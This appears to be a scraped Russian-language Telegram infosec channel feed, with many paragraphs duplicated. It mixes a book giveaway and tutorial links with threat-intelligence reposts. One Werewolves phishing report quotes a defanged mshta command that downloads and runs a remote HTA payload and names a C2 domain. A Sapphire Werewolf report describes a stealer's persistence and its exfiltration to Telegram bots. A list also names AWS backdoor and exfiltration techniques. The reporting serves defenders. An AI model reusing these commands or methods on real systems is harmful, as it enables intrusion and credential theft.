Forwarded from Записки Безопасника
⚡️Разыгрываем новые книги по информационной безопасности и этичному хакингу (в бумажном варианте):
- Black Hat Python: программирование для хакеров и пентестеров.
- Хакерство. Физические атаки с использованием хакерских устройств.
- Kali Linux в действии. Аудит безопасности информационных систем.
- Контролируемый взлом. Библия социальной инженерии.
- Хакерство. Секреты мастерства.
- Компьютер глазами хакера.
- Командная строка Linux.
- Современный PowerShell.
• Всего будет 10 призовых мест, а победители смогут выбрать любую понравившуюся книгу из списка выше. Итоги подведем ровно через неделю (25.05 в 19:00) при помощи бота который рандомно выберет победителя.
Для участия нужно:
1. Быть подписанным на наш канал @infosec_globe;
2. Подписаться на канал моих друзей @it_secur;
3. Нажать на кнопку «Участвовать».
Учитывайте, что бот может немного подвиснуть — не переживайте, просто нажмите еще раз на кнопку «Участвовать».
#Конкурс
- Black Hat Python: программирование для хакеров и пентестеров.
- Хакерство. Физические атаки с использованием хакерских устройств.
- Kali Linux в действии. Аудит безопасности информационных систем.
- Контролируемый взлом. Библия социальной инженерии.
- Хакерство. Секреты мастерства.
- Компьютер глазами хакера.
- Командная строка Linux.
- Современный PowerShell.
• Всего будет 10 призовых мест, а победители смогут выбрать любую понравившуюся книгу из списка выше. Итоги подведем ровно через неделю (25.05 в 19:00) при помощи бота который рандомно выберет победителя.
Для участия нужно:
1. Быть подписанным на наш канал @infosec_globe;
2. Подписаться на канал моих друзей @it_secur;
3. Нажать на кнопку «Участвовать».
#Конкурс
S.E.Book
Photo
Шпаргалки_цифрового_детектива_Что_и_где_искать.pdf
1 MB
• Краткий путеводитель по расположению цифровых артефактов в компьютерах и смартфонах.
• Автор: @forensictools
#CheatSheet #Форензика
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from SecAtor
͏Исследователи F.A.C.C.T. сообщили о новой волне атак с вредоносными рассылками со стороны Werewolves, специализирующейся на вымогательстве с помощью версии программы-вымогателя LockBit3 (Black), собранной на основе утекшего билдера.
Банда практикует технику двойного давления на жертву: кроме вымогательства за расшифровку данных, злоумышленники выкладывают на сайте информацию о тех, кто отказался платить выкуп, сумма которого обычно составляет 130 000 - 1 000 000$.
Ранее в апреле этого года вымогатели засветили, осуществляя массовые рассылки на тему весеннего призыва и досудебных претензий.
Целями новых атак стали российские промышленные предприятия, телекоммуникационные и IT-компании, финансовые и страховые организации.
Злоумышленники создали фейковый сайт крупного российского производителя спецтехники, полностью эмулировав содержимое оригинального портала с помощью HTTrack Website Copier. Отличие заключалось лишь в доменном имени: у оригинального - com, у фейка - ru.
Письма с темами «Досудебная претензия» и «Рекламация» содержали вредоносные вложения, загружающие Cobalt Strike Beacon.
После того, как жертва открывает вложенный документ «Рекламация.doc» загружается RTF-документ, эксплуатирующий уязвимость CVE-2017-11882.
На устройство жертвы доставляется HTA (HTML Application): mshta https://iplis[.]ru/laydowngrenade.jpeg -> hxxp://vlasta-s[.]ru/logista.hta.
HTA-файл выполняет powershell-команду, в результате которой распаковывается и запускается шелл-код Cobalt Strike Stager, который загружает Сobalt Strike Beacon, конфигурация которого содержит watermark: 987654321 и C&C: poopy[.]aarkhipov[.]ru.
Банда практикует технику двойного давления на жертву: кроме вымогательства за расшифровку данных, злоумышленники выкладывают на сайте информацию о тех, кто отказался платить выкуп, сумма которого обычно составляет 130 000 - 1 000 000$.
Ранее в апреле этого года вымогатели засветили, осуществляя массовые рассылки на тему весеннего призыва и досудебных претензий.
Целями новых атак стали российские промышленные предприятия, телекоммуникационные и IT-компании, финансовые и страховые организации.
Злоумышленники создали фейковый сайт крупного российского производителя спецтехники, полностью эмулировав содержимое оригинального портала с помощью HTTrack Website Copier. Отличие заключалось лишь в доменном имени: у оригинального - com, у фейка - ru.
Письма с темами «Досудебная претензия» и «Рекламация» содержали вредоносные вложения, загружающие Cobalt Strike Beacon.
После того, как жертва открывает вложенный документ «Рекламация.doc» загружается RTF-документ, эксплуатирующий уязвимость CVE-2017-11882.
На устройство жертвы доставляется HTA (HTML Application): mshta https://iplis[.]ru/laydowngrenade.jpeg -> hxxp://vlasta-s[.]ru/logista.hta.
HTA-файл выполняет powershell-команду, в результате которой распаковывается и запускается шелл-код Cobalt Strike Stager, который загружает Сobalt Strike Beacon, конфигурация которого содержит watermark: 987654321 и C&C: poopy[.]aarkhipov[.]ru.
• Жизнь обычных людей складывается из мелочей. Жизнь линуксоида складывается из множества маленьких полезных трюков, накапливаемых за годы работы в системе. Ценность таких трюков многим выше, если они не только удобны в использовании, но и способны повысить информационную безопасность.
• Эта статья описывает полезные методы и рекомендации по усилению безопасности серверов linux: https://www.cyberciti.biz/tips/linux-security.html
#Linux #ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
• Красивая и наглядная Модель OSI в качестве шпаргалки для начинающих.
• А я напоминаю, что собрал для Вас необходимый материал для изучения компьютерных сетей вот в этом репозитории: https://github.com/SE-adm/Awesome-network/
• Если есть желание дополнить список полезного материала, то пишите по контактам в описании репо.
#Сети
• А я напоминаю, что собрал для Вас необходимый материал для изучения компьютерных сетей вот в этом репозитории: https://github.com/SE-adm/Awesome-network/
• Если есть желание дополнить список полезного материала, то пишите по контактам в описании репо.
#Сети
Forwarded from SecAtor
После шквала мемов, сопровождающих скандал по поводу конфиденциальности пользовательских данных в яблочных девайсах, Apple решила экстренно выпустить iOS 17.5.1.
Обнаруженный баг был вызван тем, что фотографии удалялись из приложения Photos, но не из файлового менеджера, а после обновления до iOS 17.5 удаленные таким образом фото вновь появились в ленте медиатеки.
Похоже, что баг был связан с процессом переиндексации после обновления iOS, при котором система по ошибке пересохранила фотографии из файлового менеджера в приложении Photos.
Тем не менее, англоязычные владельцы сразу же преуспели в конспирологию и начали муссировать слухи про негласные договоренности Apple со спецслужбами по поводу "mirroring" данных и изображений.
Конечно, никаких доказательств никто так и нашел, но неприятный осадочек остался.
Обнаруженный баг был вызван тем, что фотографии удалялись из приложения Photos, но не из файлового менеджера, а после обновления до iOS 17.5 удаленные таким образом фото вновь появились в ленте медиатеки.
Похоже, что баг был связан с процессом переиндексации после обновления iOS, при котором система по ошибке пересохранила фотографии из файлового менеджера в приложении Photos.
Тем не менее, англоязычные владельцы сразу же преуспели в конспирологию и начали муссировать слухи про негласные договоренности Apple со спецслужбами по поводу "mirroring" данных и изображений.
Конечно, никаких доказательств никто так и нашел, но неприятный осадочек остался.
The Verge
Apple’s new iPhone update fixes a bug that resurfaced deleted nudes
Update your iPhone immediately
• Список полезных YouTube-каналов на русском языке, связанных с информационными технологиями (разработка, администрирование, митапы и конференции, интервью, новости ИТ и пр.).
- AI, ML и DataScience;
- AR, VR;
- BlockChain;
- Development;
- DevOps;
- Gamedev;
- IoT;
- IT;
- Management;
- Testing и QA;
- БД;
- Безопасность;
- Документация;
- Компании, Организации, Сообщества, Конференции;
- Образование.
#Разное #Видео
Please open Telegram to view this post
VIEW IN TELEGRAM
• В этом материале описан протокол TLS и его роль в вебе. Статья состоит из двух частей. В первой поговорим о защите соединения: от чего и как защищаемся, почему именно так, а не иначе, сколько и каких ключей для этого нужно, и разберёмся с системой сертификатов; а в конце создадим свой сертификат и посмотрим, как его использовать для разработки. Во второй части обсудим, как это дело реализуется в протоколе TLS и разберём формат TLS-пакетов по байтам.
• Предполагается, что вы что-то знаете о симметричном, асимметричном шифровании и электронной подписи:
#web #tls
Please open Telegram to view this post
VIEW IN TELEGRAM
• В этой статье описаны актуальные методы атак на AWS, которые используют злоумышленники.
• Insufficient Security Configuration;
• Insecure Data storage;
• Insecure Deployment and Configuration Management;
• Backdoor Lambda Function Through Resource-Based Policy;
• Overwrite Lambda Function Code;
• Create an IAM Roles Anywhere trust anchor;
• Exfiltrate RDS Snapshot by Sharing;
• Backdoor an S3 Bucket via its Bucket Policy;
• Exfiltrate an AMI by Sharing It;
• Exfiltrate EBS Snapshot by Sharing It;
• Execute Discovery Commands on an EC2 Instance;
• Download EC2 Instance User Data;
• Execute Commands on EC2 Instance via User Data;
• Noncompliant Code;
• Compliant Code;
• Retrieve EC2 Password Data;
• Noncompliant Code;
• Compliant Code;
• Insecure Deployment and Configuration Management;
• Local Filesystem;
• AWS Security Token;
• AWS Security Token Permission enumeration;
• ec2:CreateSnapshot and ec2:DescribeVolumes;
• Amazon Cognito;
• References.
#devsecops #aws
Please open Telegram to view this post
VIEW IN TELEGRAM
• Оказывается, что у Oracle есть плейлист с короткими видео для начинающих, которые освещают различные утилиты для мониторинга информации о состоянии системы (vmstat, iostat, rsyslog ну и т.д.):
• System Logging with rsyslog on Oracle Linux;
• System Logging with logwatch on Oracle Linux;
• System Logging with journald on Oracle Linux;
• Using the sosreport Utility on Oracle Linux;
• Using the iostat Utility on Oracle Linux;
• Using the mpstat Utility on Oracle Linux;
• Using the vmstat Utility on Oracle Linux;
• Using the netstat Utility on Oracle Linux;
• Using the top Utility on Oracle Linux;
• Use Gprofng for Performance Profiling Applications;
• Linux Auditing System on Oracle Linux.
#Видео #Linux #Мониторинг
Please open Telegram to view this post
VIEW IN TELEGRAM
• Объемный репозиторий, который содержит список инструментов для обработки файлов pcap (Packet Capture Data) при исследовании сетевого трафика:
• Linux commands;
• Traffic Capture;
• Traffic Analysis/Inspection;
• DNS Utilities;
• File Extraction;
• Related Projects.
#tools
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from SecAtor
Ресерчеры BI.ZONE сообщают об активности Sapphire Werewolf, которая модифицировала опенсорс-стилер для проведения новых атак в целях кибершпионажа.
Начиная с марта 2024 года Sapphire Werewolf реализовала уже более 300 атак на российские организации в сфере образования, промышленности, ИТ, ВПК и космоса с использованием стилера Amethyst, который злоумышленники разработали на основе программы с открытым исходным кодом - SapphireStealer.
Атакующие распространяли вредоносное ПО с помощью фишинговых электронных писем со ссылками в формате t[.]ly под видом постановления о возбуждении исполнительного производства, информационного бюллетеня ЦИК, а также указа Президента РФ.
После открытия вредоносного файла осуществляется создание папки %AppData%\Microsoft\EdgeUpdate, из Resources.MicrosoftEdgeUpdate в нее записывается MicrosoftEdgeUpdate.exe. Попутно производится запись отвлекающего документа в текущую директорию и его открытие.
Для обеспечения персистентности в системе жертвы осуществляется создание задачи в планировщике с помощью встроенной в исполняемый файл библиотеки FunnyCat.Microsoft.Win32.TaskScheduler.dll.
Имя, описание и путь к исполняемому файлу в задаче маскируются под легитимную задачу MicrosoftEdgeUpdateTaskMachineCore.
После закрепления осуществляется запись стилера Amethyst (в файл VPN.exe во временной папке данных) и его запуск, сопровождающийся изменением зоны безопасности исполняемого потока на MyComputer, а также созданием асинхронной задачи, которая впоследствии отправит собранные файлы на С2.
Собранные файлы сохраняются в папку, названием которой является строка, сгенерированная с помощью UUID. Папка находится в каталоге с временными файлами.
Стиллер собирает файлы конфигурации мессенджера Telegram, файлы с различными расширениями и с внешних носителей, данные из браузеров (Chrome, Opera, Yandex, Brave, Edge и др.), а также журналы использования PowerShell и конфиги FileZilla и SSH.
Собранные материалы помещаются в архив и отправляются на С2, а в последних версиях при создании архива используется пароль и добавляется комментарий с данными по хосту.
Роль командного сервера для отправки архива выполнял бот в Telegram, токен которого, как и идентификатор пользователя, находился в ПО.
При этом злоумышленники в код разных версий ВПО указывали не один, а сразу несколько токенов и идентификаторов пользователя. Если главный бот или основной клиент были недоступны, вредоносное ПО обращалось к другим.
IOCs и рекомендации по обнаружению вредоносной активности - в отчете.
Начиная с марта 2024 года Sapphire Werewolf реализовала уже более 300 атак на российские организации в сфере образования, промышленности, ИТ, ВПК и космоса с использованием стилера Amethyst, который злоумышленники разработали на основе программы с открытым исходным кодом - SapphireStealer.
Атакующие распространяли вредоносное ПО с помощью фишинговых электронных писем со ссылками в формате t[.]ly под видом постановления о возбуждении исполнительного производства, информационного бюллетеня ЦИК, а также указа Президента РФ.
После открытия вредоносного файла осуществляется создание папки %AppData%\Microsoft\EdgeUpdate, из Resources.MicrosoftEdgeUpdate в нее записывается MicrosoftEdgeUpdate.exe. Попутно производится запись отвлекающего документа в текущую директорию и его открытие.
Для обеспечения персистентности в системе жертвы осуществляется создание задачи в планировщике с помощью встроенной в исполняемый файл библиотеки FunnyCat.Microsoft.Win32.TaskScheduler.dll.
Имя, описание и путь к исполняемому файлу в задаче маскируются под легитимную задачу MicrosoftEdgeUpdateTaskMachineCore.
После закрепления осуществляется запись стилера Amethyst (в файл VPN.exe во временной папке данных) и его запуск, сопровождающийся изменением зоны безопасности исполняемого потока на MyComputer, а также созданием асинхронной задачи, которая впоследствии отправит собранные файлы на С2.
Собранные файлы сохраняются в папку, названием которой является строка, сгенерированная с помощью UUID. Папка находится в каталоге с временными файлами.
Стиллер собирает файлы конфигурации мессенджера Telegram, файлы с различными расширениями и с внешних носителей, данные из браузеров (Chrome, Opera, Yandex, Brave, Edge и др.), а также журналы использования PowerShell и конфиги FileZilla и SSH.
Собранные материалы помещаются в архив и отправляются на С2, а в последних версиях при создании архива используется пароль и добавляется комментарий с данными по хосту.
Роль командного сервера для отправки архива выполнял бот в Telegram, токен которого, как и идентификатор пользователя, находился в ПО.
При этом злоумышленники в код разных версий ВПО указывали не один, а сразу несколько токенов и идентификаторов пользователя. Если главный бот или основной клиент были недоступны, вредоносное ПО обращалось к другим.
IOCs и рекомендации по обнаружению вредоносной активности - в отчете.
BI.ZONE
Sapphire Werewolf оттачивает известный стилер для новых атак
Чтобы собирать аутентификационные данные сотрудников российских компаний, злоумышленники разработали собственное вредоносное ПО на основе SapphireStealer с открытым исходным кодом
• Эта статья целиком посвящена сканированию сетевой инфраструктуры — второму этапу пентеста, который следует после разведки. Если при разведке мы ищем IP-адреса и различные точки входа в инфраструктуру, то при сканировании — внимательно исследуем все найденное.
#Пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from SecAtor
В киберподполье набирает популярность нацеленный на банкоматы в Европе новый штамм вредоносного ПО под названием EU ATM Malware с заявленной беспрецедентной эффективностью в 99%.
Согласно утверждениям селлера, EU ATM Malware способен расчехлить практически любой европейский банкомат и до 60% устройств по всему миру, производимых Diebold Nixdorf, Hyosung, Oki, Bank of America, NCR, GRG, Hitachi и др.
Заявленные экономические ТТХ вредоноса гарантируют покупателю до 30 000 долларов за банкомат, при этом модностью автоматизировано, обеспечивая развертывание и эксплуатацию. Но также имеет и ручной режим работы.
Селлер предлагает гибкую систему оплаты и готов предоставить ежемесячную подписку, демоверсию полезной нагрузки на срок до трех дней, а также первоначальный взнос с выделением доли прибыли от успешных операций.
Насколько EU ATM Malware соответствует заявленным характеристикам и станет ли реальной угрозой банковского сектора в Европе пока не ясно, но будем посмотреть.
Согласно утверждениям селлера, EU ATM Malware способен расчехлить практически любой европейский банкомат и до 60% устройств по всему миру, производимых Diebold Nixdorf, Hyosung, Oki, Bank of America, NCR, GRG, Hitachi и др.
Заявленные экономические ТТХ вредоноса гарантируют покупателю до 30 000 долларов за банкомат, при этом модностью автоматизировано, обеспечивая развертывание и эксплуатацию. Но также имеет и ручной режим работы.
Селлер предлагает гибкую систему оплаты и готов предоставить ежемесячную подписку, демоверсию полезной нагрузки на срок до трех дней, а также первоначальный взнос с выделением доли прибыли от успешных операций.
Насколько EU ATM Malware соответствует заявленным характеристикам и станет ли реальной угрозой банковского сектора в Европе пока не ясно, но будем посмотреть.
Daily Dark Web
New ATM Malware Threatens European Banking Security - Daily Dark Web
New ATM Malware Threatens European Banking Security Discover the latest security threats and database leaks, including unauthorized VPN access and email breaches, in the cyber underground world.Stay informed about emerging cyber threats, such as unauthorized…
• Список практических советов по работе с PostgreSQL от специалиста с 20-летним стажем. Ну и не забывайте про дополнительный материал по хэштегам, если Вам интересна какая-либо из тем.
#PostgreSQL
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Cyber Media
🔥Итоги премии «Киберпросвет»
В большинстве номинаций конкуренция с каждым годом растет – мы получаем очень много интересных заявок, среди которых очень трудно выбрать наиболее выдающегося участника.
Много замечательных проектов в этом году остались без награды, но мы обязательно будем отслеживать их деятельность, а отдельные инфоповоды наверняка попадут в нашу ленту новостей.
Представляем победителей:
➡️ «Искать и не сдаваться, найти и отрепортить»: Лука Сафонов, группа компаний Гарда;
➡️ «Не надо представляться, я вас уже загуглил»: АРСИБ;
➡️ «А у вас БД убежала!»: Ксения Шудрова, «Защита персональных данных и не только – книга рецептов»;
➡️ «Часть команды, часть корабля»: ARinteg;
➡️ «Это знать надо, это классика»: Ростелеком;
➡️ «Все великое начинается с малого»: Андрей Матвеенко, МТС RED и Дмитрий Федоров, Positive Technologies;
➡️ «Силу чувствую в тебе я, юный ПК-пользователь»: GigaHackers, УЦСБ;
➡️ «Добро должно быть с эксплойтами»: Айдар Гузаиров, Innostage и Андрей Жуков, УЦСБ;
➡️ «Кибербезопасность – это стильно!»: BI. ZONE и ВТБ;
➡️ «Я научу тебя всему, что умею сам»: Павел Степанов, Перевод Энтузиаста и Angara Security;
➡️ «TeamLead of the cybergym»: Кирилл Филимонов, RAD COP;
➡️ «Кибербезопасность нас связала»: УЦСБ и Союзмультфильм;
➡️ «Любая разгаданная загадка кажется потом поразительно легкой»: F.A.C.C.T.;
➡️ «Я выбрал синюю таблетку и ни о чем не жалею»: Михаил Аксенов, Defbox;
➡️ «Без меня в прод никто не пойдет!»: Светлана Газизова, Positive Technologies;
➡️ «История нашей компании началась еще до печенегов»: Дмитрий Евдокимов, Luntry;
➡️ «Скайнет не победит, если быть ИИнициативными»: Лидия Виткова, «Газинформсервис» и Артем Семенов, Positive Technologies;
➡️ «На лекции — Хакатон, на дом — CTF»: Кафедра №42, НИЯУ МИФИ;
➡️ «У нас дыра в безопасности»: Павел Попов, Positive Technologies;
➡️ «Фиолетовый — цвет сезона»: Вадим Шелест, Wildberries;
➡️ «Каждый сотрудник — часть отдела ИБ»: Роман Панин, МТС.
Узнать подробнее о номинантах, их проектах и деятельности можно на странице премии.
В большинстве номинаций конкуренция с каждым годом растет – мы получаем очень много интересных заявок, среди которых очень трудно выбрать наиболее выдающегося участника.
Много замечательных проектов в этом году остались без награды, но мы обязательно будем отслеживать их деятельность, а отдельные инфоповоды наверняка попадут в нашу ленту новостей.
Представляем победителей:
Узнать подробнее о номинантах, их проектах и деятельности можно на странице премии.
Please open Telegram to view this post
VIEW IN TELEGRAM